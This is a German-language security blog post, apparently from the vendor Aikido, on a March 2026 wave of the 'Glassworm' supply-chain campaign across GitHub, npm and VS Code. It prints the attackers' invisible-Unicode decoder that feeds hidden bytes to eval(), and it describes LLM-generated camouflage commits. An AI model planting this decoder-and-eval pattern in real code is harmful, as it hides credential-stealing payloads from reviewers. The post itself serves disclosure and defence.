Die unsichtbare Bedrohung, die wir seit fast einem Jahr verfolgen, ist zurück. Während die PolinRider-Kampagne Schlagzeilen gemacht hat, weil sie Hunderte von GitHub-Repositorys kompromittiert hat, beobachten wir parallel dazu eine neue Welle von Glassworm-Aktivitäten, die GitHub, npm und VS Code trifft.
Im Oktober letzten Jahres berichteten wir darüber, wie versteckte Unicode-Zeichen dazu genutzt wurden, GitHub-Repositorys zu kompromittieren, und führten diese Technik auf einen Angreifer namens Glassworm zurück. Diesen Monat ist derselbe Angreifer wieder aktiv, und unter den betroffenen Repositorys befinden sich einige namhafte Projekte: ein Repo von Wasmer, Reworm sowie opencode-bench von anomalyco, der Organisation hinter OpenCode und SST.
Kampagne „Ein Jahr des unsichtbaren Codes“
- März 2025: Aikido entdeckt Aikido bösartige npm-Pakete, die Payloads mithilfe von PUA-Unicode-Zeichen verbergen
- Mai 2025: Wir veröffentlichen einen Blogbeitrag, in dem wir die Risiken von unsichtbarem Unicode und dessen Missbrauch bei Lieferkettenangriffe näher erläutern
- 17. Oktober 2025: Wir decken mit derselben Technik kompromittierte Erweiterungen auf Open VSX auf
- 31. Oktober 2025: Wir stellen fest, dass die Angreifer ihren Fokus auf GitHub-Repositorys verlagert haben
- März 2026: Eine neue Massenwelle bricht aus: Hunderte von GitHub-Repositorys sind kompromittiert, darunter auch npm und VS Code.
Eine kurze Auffrischung
Bevor wir uns mit dem Ausmaß dieser neuen Welle befassen, wollen wir noch einmal zusammenfassen, wie dieser Angriff funktioniert. Selbst nach monatelanger Berichterstattung überrascht er Entwickler und Tools immer noch.
Der Trick basiert auf unsichtbaren Unicode-Zeichen: Code-Schnipsel, die in praktisch jedem Editor, Terminal und jeder Code-Review-Oberfläche nicht angezeigt werden. Angreifer nutzen diese unsichtbaren Zeichen, um eine Schadladung direkt in einer scheinbar leeren Zeichenkette zu verbergen. Wenn die JavaScript-Laufzeitumgebung darauf stößt, extrahiert ein kleiner Decoder die eigentlichen Bytes und leitet sie an eval().
So sieht die Einfügung aus. Denk daran, dass die scheinbare Lücke in den leeren Backticks unten alles andere als leer ist:
const s = v => [...v].map(w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));Die an s() Es sieht in jedem Viewer leer aus, ist jedoch vollgepackt mit unsichtbaren Zeichen, die nach der Entschlüsselung eine vollständige bösartige Nutzlast erzeugen. Bei früheren Vorfällen hat diese entschlüsselte Nutzlast ein Skript der zweiten Stufe abgerufen und ausgeführt, wobei Solana als Übertragungskanal diente; dieses Skript war in der Lage, Token, Anmeldedaten und secrets zu stehlen.
Das Ausmaß der Welle im März 2026
Wir beobachten eine groß angelegte Kampagne des Cyberkriminellen „Glassworm“, die sich über Open-Source-Repositorys ausbreitet. Eine Code-Suche auf GitHub nach dem Decoder-Muster liefert derzeit mindestens 151 treffende Repositorys, wobei diese Zahl das tatsächliche Ausmaß unterschätzt, da viele betroffene Repositorys zum Zeitpunkt der Erstellung dieses Artikels bereits gelöscht wurden. Die Angriffe auf GitHub scheinen zwischen dem 3. und 9. März stattgefunden zu haben.
Die Kampagne hat sich zudem über GitHub hinaus ausgeweitet. Wir beobachten nun, dass dieselbe Technik auch bei npm und im VS Code Marketplace zum Einsatz kommt, was darauf hindeutet, dass Glassworm eine koordinierte, mehrere Ökosysteme umfassende Offensive durchführt. Dies steht im Einklang mit dem bisherigen Verhaltensmuster der Gruppe, zwischen verschiedenen Registries zu wechseln.
Bekannte kompromittierte Repositorys auf GitHub
Unter den von uns identifizierten Repositories gehören mehrere zu bekannten Projekten mit einer beachtlichen Anzahl an Sternen, was sie zu besonders wertvollen Zielen für Auswirkungen auf die nachgelagerte Lieferkette macht:
KI-gestützte Tarnung
Wie wir bereits in unserem Artikel vom Oktober erwähnt haben, tauchen die böswilligen Einfügungen nicht in offensichtlich verdächtigen Commits auf. Die umgebenden Änderungen wirken realistisch: Anpassungen an der Dokumentation, Versionserhöhungen, kleine Refactorings und Fehlerbehebungen, die stilistisch mit dem jeweiligen Zielprojekt übereinstimmen.
Dieser Grad an projektspezifischer Anpassung lässt stark vermuten, dass die Angreifer große Sprachmodelle einsetzen, um überzeugende Scheincommits zu generieren. In dem Ausmaß, wie wir es derzeit beobachten, ist es schlichtweg nicht machbar, mehr als 151 maßgeschneiderte Codeänderungen über verschiedene Codebasen hinweg manuell zu erstellen.
Erkennung und Schutz
Unsichtbare Bedrohungen erfordern aktive Abwehrmaßnahmen. Man kann sich nicht darauf verlassen, dass visuelle Codeüberprüfungen oder Standard-Linting-Verfahren das aufspüren, was man nicht sehen kann. Bei Aikido haben wir eine Erkennung für unsichtbare Unicode-Injektionen direkt in unsere Malware-Scan-Pipeline integriert.
Wenn Sie bereits Aikido verwenden, würden diese Pakete in Ihrem Feed als kritischer Befund mit dem Status 100/100 gekennzeichnet.
Aikido nicht bei Aikido ? Erstellen Sie ein kostenloses Konto und verknüpfen Sie Ihre Repositorys. Der kostenlose Tarif umfasst unseren Malware-Schutz (keine Kreditkarte erforderlich).
Schließlich kann ein Tool, das Malware in der Lieferkette in Echtzeit stoppt, sobald sie auftritt, eine schwerwiegende Infektion verhindern. Das ist die Idee hinter Aikido Chain, einem kostenlosen Open-Source-Tool, das npm, npx, yarn, pnpm und pnpx umschließt und sowohl KI als auch menschliche Malware-Forscher einsetzt, um die neuesten Risiken in der Lieferkette zu erkennen und zu blockieren, bevor sie in Ihre Umgebung gelangen.
{{cta}}
